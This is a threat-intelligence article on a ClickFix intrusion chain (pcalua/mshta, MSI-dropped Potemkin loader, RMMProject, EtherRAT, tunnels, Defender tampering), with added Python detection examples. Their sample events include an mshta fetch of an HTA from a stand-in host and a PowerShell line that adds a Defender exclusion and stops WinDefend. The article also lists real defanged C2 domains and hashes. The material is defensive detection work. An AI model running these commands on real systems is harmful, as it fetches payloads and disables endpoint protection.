Hackers Use ClickFix Prompt to Install MSI Package and Launch Hands-On-Keyboard Attack
A ClickFix attack observed by Huntress in May 2026 shows how one copied command can turn into a full network intrusion involving custom malware, remote access tools, lateral movement, and Defender evasion.
According to Huntress, the incident started when a user visited a compromised website and followed a fake troubleshooting prompt. The prompt told the user to press Win+R, paste a command into the Windows Run dialog, and run it.
The first infected system had no endpoint monitoring agent installed. That gave the attacker time to install an MSI package, deploy the Potemkin loader, load RMMProject in memory, add EtherRAT, create tunnels, and move laterally before defenders gained visibility.
ClickFix Turns the User Into the Delivery Mechanism
ClickFix is a social engineering technique that tricks users into running malicious commands themselves. Instead of relying on a malicious attachment, attackers show a fake error, verification step, browser fix, or support message that tells the victim exactly what to paste into Windows.
In this case, the command abused pcalua.exe, a legitimate Windows Program Compatibility Assistant component, to launch mshta.exe. The mshta.exe utility then retrieved a malicious HTA file from attacker-controlled infrastructure.
Red Canary describes mshta.exe as a Windows-native binary used to execute Microsoft HTML Application code. Attackers often abuse it because it can run script code through a trusted Windows utility.
| Attack stage | What happened |
|---|---|
| Initial lure | User followed a fake ClickFix instruction on a compromised website |
| Command execution | The pasted command used pcalua.exe to proxy mshta.exe |
| Payload retrieval | mshta.exe fetched a malicious HTA file from attacker infrastructure |
| MSI install | The HTA downloaded and executed inst24.msi in the background |
| Loader deployment | The MSI installed the Potemkin loader and created persistence |
Potemkin Loader Delivered RMMProject in Memory
The MSI package installed a custom x64 loader that Huntress calls Potemkin. It was dropped in the user profile and persisted through a Run registry key named RunSearch.
Potemkin uses a deterministic domain generation algorithm. Huntress said the loader can generate 10,000 candidate domains from a built-in word list and probe them until it finds an active command-and-control server.
After Potemkin connects to its server, its main job is to fetch and reflectively load RMMProject. The Hacker News also reported that this ClickFix chain installs an MSI package that drops Potemkin and leads to RMMProject and EtherRAT activity.
- Potemkin was delivered through an MSI installer named inst24.msi.
- The loader persisted through HKCU Run key activity.
- It used a DGA to find a live command-and-control domain.
- It reflectively loaded follow-on modules in memory.
- Its main payload was RMMProject, a Lua-scriptable remote access tool.
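A loader that walks through generated candidate domains until one answers leaves a recognisable trail in DNS telemetry: a burst of lookups that fail with NXDOMAIN before one succeeds. The following detector, an added example and not Huntress tooling, counts distinct failed names per host inside a sliding window and flags hosts that cross a threshold. The log format it parses (one lookup per line: ISO timestamp, host, queried name, response code) and the sample lines are constructed for the example; real telemetry such as Sysmon event 22 or DNS server logs needs its own parser.

```python
"""Spot DGA-style probing in DNS telemetry (added example, not Huntress tooling).

Assumed log format, one lookup per line:
    "<ISO timestamp> <host> <queried name> <rcode>"
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from itertools import product

# Constructed two-word names that stand in for word-list DGA output; they are
# not indicators from the incident.
_WORDS = ["alpha", "bravo", "cedar", "delta", "ember", "fable", "grove"]


def sample_log():
    """Constructed DNS log: one clean host and one host probing 30 generated names."""
    base = datetime(2026, 5, 1, 9, 0, 0)
    lines = []
    for i, name in enumerate(["update.example.invalid", "mail.example.invalid"]):
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()} ws-clean {name} NOERROR")
    for i, (a, b) in enumerate(list(product(_WORDS, repeat=2))[:30]):
        ts = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} ws-infected {a}{b}.invalid NXDOMAIN")
    # The probe that finally answers: the candidate the operator actually registered.
    lines.append(f"{(base + timedelta(seconds=31)).isoformat()} ws-infected grovecedar.invalid NOERROR")
    return lines


def parse_line(line):
    ts, host, name, rcode = line.split()
    return datetime.fromisoformat(ts), host, name, rcode


def find_dga_candidates(lines, window_seconds=60, threshold=20):
    """Return {host: set_of_failed_names} for every host that accumulates at
    least `threshold` distinct NXDOMAIN names inside any `window_seconds` window."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # host -> deque of (timestamp, name), oldest first
    flagged = {}
    for line in sorted(lines):  # ISO timestamps sort lexically
        ts, host, name, rcode = parse_line(line)
        if rcode != "NXDOMAIN":
            continue
        q = recent[host]
        q.append((ts, name))
        while ts - q[0][0] > window:  # drop entries that fell out of the window
            q.popleft()
        distinct = {n for _, n in q}
        if len(distinct) >= threshold and len(distinct) > len(flagged.get(host, ())):
            flagged[host] = distinct
    return flagged


if __name__ == "__main__":
    for host, names in find_dga_candidates(sample_log()).items():
        print(f"{host}: {len(names)} distinct failed lookups, e.g. {sorted(names)[:3]}")
```

The threshold and window are deliberately conservative; a host that resolves 20 distinct non-existent names in a minute is unusual for a workstation, but noisy environments (security scanners, misconfigured search suffixes) should be allow-listed before the rule pages anyone.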
RMMProject Added Browser Theft and Remote Control
RMMProject is a larger malware framework delivered by Potemkin. Huntress said it supports 15 task types, among them browser credential theft, cookie stealing, process injection, remote desktop control, and runtime module loading.
The malware also included tooling to target Chromium App-Bound Encryption protections. That matters because App-Bound Encryption was designed to make browser cookie theft harder by binding secrets more tightly to the application and system context.
The broader ClickFix trend is expanding. The Hacker News report noted that recent ClickFix campaigns have also delivered other loaders, including BabaDeda and Lorem Ipsum, alongside Potemkin.
| Malware | Role in the intrusion |
|---|---|
| Potemkin | Custom loader that finds C2 infrastructure and loads modules in memory |
| RMMProject | Remote access framework with browser theft, remote desktop, and injection features |
| EtherRAT | Node.js backdoor that retrieves its C2 from Ethereum blockchain data |
| Chisel | Tunneling tool used for SOCKS proxy access during the intrusion |
| cloudflared | Renamed tunnel client used to maintain remote access into the environment |
EtherRAT Added Blockchain-Based Resilience
Five hours after the first infection, the attacker deployed EtherRAT, a Node.js backdoor. EtherRAT resolves its command-and-control server through data stored on the Ethereum blockchain, which makes traditional domain takedowns less effective.
Sysdig previously documented EtherRAT as a persistent access implant that differs from simpler payloads because it uses blockchain-based infrastructure to retrieve control information.
In the Huntress case, EtherRAT was delivered through a separate MSI package named cons_1.0.1.msi and persisted through a Run key named EdgeUpdate. The name helped it masquerade as a browser update component.
The Intrusion Became Hands-On-Keyboard Activity
After the initial foothold, a human operator began working through the victim network manually. Huntress observed lateral movement across 11 hosts, with the attacker using tools and behaviors consistent with WMIExec and SMBExec activity.

The operator used compromised Administrator credentials, ran reconnaissance, moved to the domain controller, and pushed malware across the environment. This shows why a ClickFix prompt should not be treated as a low-level user mistake. It can become the start of a larger intrusion.
The attacker also fought Microsoft Defender throughout the session. Microsoft’s Add-MpPreference documentation says the cmdlet can add exclusions for file paths, extensions, and processes, which is why bulk exclusion changes that appear unexpectedly are a strong detection signal.
- The attacker gained initial execution through the ClickFix command.
- The HTA downloaded and ran an MSI package.
- Potemkin established loader persistence.
- RMMProject provided remote access and browser theft capabilities.
- EtherRAT created a second persistent access path.
- The attacker used compromised admin credentials for lateral movement.
- Defender controls were weakened through exclusions, registry changes, and service tampering.
Cloudflare Tunnel and Chisel Helped Maintain Access
The attacker also set up a Cloudflare tunnel using a renamed copy of cloudflared. Cloudflare says Cloudflare Tunnel can connect applications and networks to Cloudflare through outbound-only connections, which makes it useful for legitimate remote access but attractive to attackers after compromise.
Chisel was also used to create SOCKS proxy access. Together, these tunnels gave the operator more than one way to reach into the environment and continue post-exploitation activity.
A renamed tunnel binary on an ordinary workstation should trigger immediate review. Cloudflare Tunnel has legitimate uses, but unexpected cloudflared activity on endpoints can indicate covert access.
Defender Evasion Was a Major Part of the Attack
The attacker repeatedly tried to weaken Windows Defender. Huntress observed AMSI patches, registry policy changes, reflective loading, Defender exclusion abuse, and attempts to stop the Defender service.
Security teams should treat mass Defender exclusion changes as suspicious, especially when paired with new Run keys, renamed tunneling tools, PowerShell scripts under ProgramData, or new MSI installs launched from temporary folders.
Microsoft’s Defender PowerShell documentation shows that exclusions can disable scanning for selected paths or processes. That legitimate administrative feature becomes dangerous when an attacker uses it to hide malware staging directories.
- Alert on pcalua.exe launching mshta.exe, PowerShell, cmd.exe, or scripts.
- Monitor mshta.exe fetching remote HTA files.
- Investigate MSI installs launched soon after browser activity.
- Alert on Run keys named RunSearch or EdgeUpdate when they point to unusual binaries.
- Review unexpected cloudflared, Chisel, or SOCKS proxy activity on endpoints.
- Treat Stop-Service WinDefend and bulk Defender exclusions as high-risk events.
- Ensure every endpoint has active monitoring before attackers get an unobserved foothold.
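The detection points above translate into a small set of rules over process-creation and registry telemetry. The block below is an added example, not Huntress or vendor code: it models events as dicts with Sysmon-style field names (EventID 1 for process creation with Image, ParentImage, CommandLine and OriginalFileName; EventID 13 for a registry value set with TargetObject and Details) and runs each rule over a constructed batch that mixes the chain's behaviours with benign activity. The field names, the renamed-binary check via the PE's OriginalFileName, and the sample events are this example's own assumptions.

```python
"""Behavioral detections for a ClickFix-to-Defender-tampering chain.

Added example, not Huntress or vendor code. Event schema and sample events are
assumptions constructed for the example.
"""
import ntpath
import re

SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_RUN_NAMES = {"runsearch", "edgeupdate"}
TUNNEL_ORIGINAL_NAMES = {"cloudflared.exe", "chisel.exe"}  # assumes PE version info is populated
TRUSTED_DIRS = (r"c:\program files", r"c:\windows")


def _base(path):
    return ntpath.basename(path or "").lower()


def _in_temp(path):
    return "\\temp\\" in (path or "").lower()


def detect(event):
    """Return the names of every rule that fires for a single event."""
    hits = []
    if event.get("EventID") == 1:
        image, parent = _base(event.get("Image")), _base(event.get("ParentImage"))
        cmd = event.get("CommandLine") or ""
        # pcalua.exe proxying a script host is the ClickFix tell from this case
        if parent == "pcalua.exe" and image in SCRIPT_HOSTS:
            hits.append("pcalua_proxy_execution")
        # mshta.exe pulling an HTA over HTTP(S) rather than opening a local file
        if image == "mshta.exe" and re.search(r"https?://", cmd, re.I):
            hits.append("mshta_remote_hta")
        # MSI installs launched out of a temporary folder
        if image == "msiexec.exe" and _in_temp(cmd):
            hits.append("msi_install_from_temp")
        # A tunnel client whose on-disk name no longer matches its original file name
        orig = (event.get("OriginalFileName") or "").lower()
        if orig in TUNNEL_ORIGINAL_NAMES and orig != image:
            hits.append("renamed_tunnel_binary")
        # Defender tampering through the documented cmdlets
        if re.search(r"add-mppreference\b.*-exclusion", cmd, re.I):
            hits.append("defender_exclusion_added")
        if re.search(r"stop-service\b.*windefend", cmd, re.I):
            hits.append("defender_service_stop")
    elif event.get("EventID") == 13:
        target = event.get("TargetObject") or ""
        value = (event.get("Details") or "").strip('"').lower()
        if "\\currentversion\\run\\" in target.lower():
            name = target.rsplit("\\", 1)[-1].lower()
            # The incident's Run key names, pointing outside a trusted install directory
            if name in SUSPICIOUS_RUN_NAMES and not value.startswith(TRUSTED_DIRS):
                hits.append("suspicious_run_key")
    return hits


def scan(events):
    """Return [(event_index, rule_name), ...] across a batch of events."""
    return [(i, rule) for i, ev in enumerate(events) for rule in detect(ev)]


# Constructed sample batch: five malicious events followed by two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": "mshta.exe https://lure.example.invalid/fix.hta", "OriginalFileName": "MSHTA.EXE"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\u\AppData\Local\Temp\inst24.msi /qn", "OriginalFileName": "msiexec.exe"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunSearch",
     "Details": r"C:\Users\u\AppData\Roaming\RunSearch.exe"},
    {"EventID": 1, "Image": r"C:\ProgramData\svc\update.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "update.exe tunnel run --token REDACTED", "OriginalFileName": "cloudflared.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell -c "Add-MpPreference -ExclusionPath C:\ProgramData; Stop-Service WinDefend"',
     "OriginalFileName": "PowerShell.EXE"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\u\Downloads\tool.msi", "OriginalFileName": "msiexec.exe"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule is narrow on purpose so that a hit is worth an analyst's time: the Run-key rule only fires for the two names seen in this intrusion and ignores values under trusted install directories, and the tunnel rule depends on the binary's version resource surviving the rename. Command lines that encode or obfuscate the URL will slip past the mshta check, so pair it with network telemetry for mshta.exe.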
Indicators Linked to the ClickFix Intrusion
The indicators below are drawn from the Huntress case and should be combined with behavior-based detection. Attackers can rotate domains and filenames quickly, but the broader pattern remains clear: ClickFix prompt, pcalua.exe, mshta.exe, MSI installation, loader persistence, remote access tooling, and Defender tampering.
| Type | Indicator | Description |
|---|---|---|
| SHA256 | 2abe5dd3a057fdef935722e50e9251c272d29fd26113187b853a1f9a9cb89d9b | Potemkin loader, RunSearch.exe |
| SHA256 | 3b7ae925e2d64522b4f69b56285b05aeca8c5aab5ab46a9c02c4fafb69d881ce | RMMProject RAT, avast_update.bin |
| SHA256 | 79f7b67ce8b39070f3e1c2b90fce0ce84134782a7dedcccc1edac197ee9e089b | inst24.msi, MSI installer that drops Potemkin |
| SHA256 | 2ada24dd6e517f37942b749c2bd57ddd97445e9853002cee70a0bc30d0b0ce3a | cons_1.0.1.msi, MSI that delivers EtherRAT |
| Domain | cl.distritovagas[.]com | ClickFix HTA delivery domain |
| Domain | sonra.eutialyson[.]com | MSI download domain |
| Domain | anus-staylard[.]xyz | Potemkin and RMMProject C2 domain |
| Domain | resumeacceptable[.]com | EtherRAT C2 resolved from Ethereum blockchain data |
| IP address | 77.110.122[.]58 | Primary C2 and staging server |
| Registry key | HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunSearch | Potemkin persistence key |
| Registry key | HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate | EtherRAT persistence key |
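Indicators published in defanged form need refanging before they can be matched, domains should match on subdomains too, and registry keys reported by EDR telemetry under the user's SID (HKU\S-1-5-21-...) need mapping onto the HKCU form used in the table. The block below, an added example rather than Huntress tooling, copies the table's indicators and matches them against a constructed batch of events; the refanging rules, the key normalisation, the event schema and the sample events are this example's own assumptions.

```python
"""Match the indicator table against endpoint and DNS telemetry.

Added example, not Huntress tooling. Indicator values come from the table
above; everything else (event schema, normalisation, samples) is assumed.
"""
import re

INDICATORS = {
    "sha256": {
        "2abe5dd3a057fdef935722e50e9251c272d29fd26113187b853a1f9a9cb89d9b": "Potemkin loader (RunSearch.exe)",
        "3b7ae925e2d64522b4f69b56285b05aeca8c5aab5ab46a9c02c4fafb69d881ce": "RMMProject (avast_update.bin)",
        "79f7b67ce8b39070f3e1c2b90fce0ce84134782a7dedcccc1edac197ee9e089b": "inst24.msi",
        "2ada24dd6e517f37942b749c2bd57ddd97445e9853002cee70a0bc30d0b0ce3a": "cons_1.0.1.msi",
    },
    "domain": {
        "cl.distritovagas[.]com": "ClickFix HTA delivery",
        "sonra.eutialyson[.]com": "MSI download",
        "anus-staylard[.]xyz": "Potemkin/RMMProject C2",
        "resumeacceptable[.]com": "EtherRAT C2",
    },
    "ip": {"77.110.122[.]58": "C2 and staging server"},
    "registry": {
        r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunSearch": "Potemkin persistence",
        r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate": "EtherRAT persistence",
    },
}


def refang(value):
    """Undo common defanging: [.] / (.) / [dot] -> . and hxxp -> http."""
    return re.sub(r"\[\.\]|\(\.\)|\[dot\]", ".", value).replace("hxxp", "http")


_SID_RE = re.compile(r"^HKU\\S-1-5-21(?:-\d+)+\\", re.I)


def normalise_registry(key):
    """Map HKU\\<user SID>\\... (how EDR telemetry reports it) onto HKCU\\..., lowercased."""
    key = _SID_RE.sub(lambda m: "HKCU\\", key)
    return key.replace("HKEY_CURRENT_USER", "HKCU").lower()


_IOC = {
    "sha256": {h.lower(): d for h, d in INDICATORS["sha256"].items()},
    "domain": {refang(k).lower(): d for k, d in INDICATORS["domain"].items()},
    "ip": {refang(k): d for k, d in INDICATORS["ip"].items()},
    "registry": {normalise_registry(k): d for k, d in INDICATORS["registry"].items()},
}


def match_domain(name):
    """Exact or subdomain match: a.b.evil.tld matches evil.tld, notevil.tld does not."""
    parts = name.lower().rstrip(".").split(".")
    for i in range(len(parts) - 1):  # never test the bare TLD
        hit = _IOC["domain"].get(".".join(parts[i:]))
        if hit:
            return hit
    return None


def match_event(ev):
    """ev may carry sha256, dns, dst_ip and/or registry. Returns [(type, description)]."""
    out = []
    if ev.get("sha256") and ev["sha256"].lower() in _IOC["sha256"]:
        out.append(("sha256", _IOC["sha256"][ev["sha256"].lower()]))
    if ev.get("dns"):
        hit = match_domain(ev["dns"])
        if hit:
            out.append(("domain", hit))
    if ev.get("dst_ip") and ev["dst_ip"] in _IOC["ip"]:
        out.append(("ip", _IOC["ip"][ev["dst_ip"]]))
    if ev.get("registry"):
        key = normalise_registry(ev["registry"])
        if key in _IOC["registry"]:
            out.append(("registry", _IOC["registry"][key]))
    return out


def scan(events):
    return [(ev.get("host"), t, d) for ev in events for t, d in match_event(ev)]


# Constructed sample telemetry; only the indicator values are from the table.
SAMPLE_EVENTS = [
    {"host": "ws-01", "dns": "cl.distritovagas.com"},
    {"host": "ws-01", "dns": "files.anus-staylard.xyz"},   # subdomain of a C2 domain
    {"host": "ws-01", "dns": "notresumeacceptable.com"},   # lookalike that must not match
    {"host": "ws-01", "dst_ip": "77.110.122.58"},
    {"host": "ws-02", "sha256": "2ABE5DD3A057FDEF935722E50E9251C272D29FD26113187B853A1F9A9CB89D9B"},
    {"host": "ws-02", "registry": r"HKU\S-1-5-21-111-222-333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate"},
    {"host": "ws-03", "dns": "update.example.invalid"},
]

if __name__ == "__main__":
    for host, kind, desc in scan(SAMPLE_EVENTS):
        print(f"{host}: {kind} match, {desc}")
```

Hash and IP matches are exact by nature; the value of this kind of matcher is in the normalisation steps, since a Run key written under HKU\S-1-5-21-... or a lookup for a subdomain of a listed C2 domain would otherwise be missed by a naive string comparison.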
How Organizations Can Reduce ClickFix Risk
The biggest lesson from this case is endpoint coverage. The attacker gained time because the first machine had no monitoring agent. Once visibility came online, the security team could identify and contain activity, but the initial gap shaped the damage window.

Organizations should also train users to reject browser prompts that ask them to paste commands into Run, PowerShell, Terminal, or Command Prompt. A real website should not ask a user to run a command to view a page, fix a CAPTCHA, install a browser update, or complete verification.
Huntress’ ClickFix guidance explains that the technique works because it looks like a normal online instruction. The latest Huntress intrusion report shows what can happen when that instruction runs on an unmonitored system.
Mshta monitoring should also be part of endpoint detection, especially when mshta.exe starts from pcalua.exe or reaches out to remote content. The EtherRAT research shows why blockchain-based C2 can complicate takedown efforts once a backdoor reaches the network.
FAQ
A ClickFix attack is a social engineering technique that tricks users into copying and running malicious commands in tools such as the Windows Run dialog, PowerShell, Command Prompt, or Terminal. The prompt usually pretends to be a fix, verification step, or browser update.
A user ran a malicious ClickFix command on an unmonitored endpoint. The command fetched an HTA file, installed an MSI package, dropped the Potemkin loader, loaded RMMProject, deployed EtherRAT, and led to hands-on-keyboard lateral movement across 11 hosts.
The attacker used pcalua.exe, a legitimate Windows Program Compatibility Assistant component, to indirectly launch mshta.exe. This helped the command look less obvious while still fetching and running the malicious HTA payload.
Potemkin is a custom loader, RMMProject is a Lua-scriptable remote access framework with browser theft and remote desktop features, and EtherRAT is a Node.js backdoor that retrieves its command-and-control address from Ethereum blockchain data.
Organizations should alert on pcalua.exe launching mshta.exe, mshta.exe fetching remote HTA files, suspicious MSI installs, unusual Run keys, unexpected cloudflared or Chisel activity, Defender exclusion changes, and any endpoint without active monitoring coverage.